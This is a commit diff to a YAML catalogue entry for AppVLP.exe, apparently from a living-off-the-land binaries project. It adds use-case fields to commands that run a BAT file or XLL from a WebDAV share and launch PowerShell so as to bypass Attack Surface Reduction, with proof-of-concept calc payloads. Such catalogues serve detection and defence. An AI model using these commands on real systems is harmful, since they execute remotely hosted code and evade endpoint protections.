Updated yml for: appvlp and bginfo.

yml/OtherMSBinaries/Appvlp.yml

@@ -5,6 +5,7 @@ Author: ''
 Created: '2018-05-25'
 Commands:
   - Command: AppVLP.exe \\webdav\calc.bat
+    Usecase: Execution of BAT file hosted on Webdav server.
     Description: Executes calc.bat through AppVLP.exe
     Categories: ['Execution', 'ASR Bypass']
     Privileges: User
@@ -12,6 +13,7 @@ Commands:
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 w/Office 2016
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
+    Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
     Categories: ['Execution', 'ASR Bypass']
     Privileges: User
@@ -19,6 +21,7 @@ Commands:
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 w/Office 2016
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
+    Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
     Categories: ['Execution', 'ASR Bypass']
     Privileges: User
@@ -37,8 +40,8 @@ Resources:
   - https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
 Acknowledgement:
   - Person: fab
-    Handle: @0rbz_
+    Handle: '@0rbz_'
   - Person: Will
-    Handle: @moo_hax
+    Handle: '@moo_hax'
   - Person: Matt Wilson
-    Handle: @enigma0x3
+    Handle: '@enigma0x3'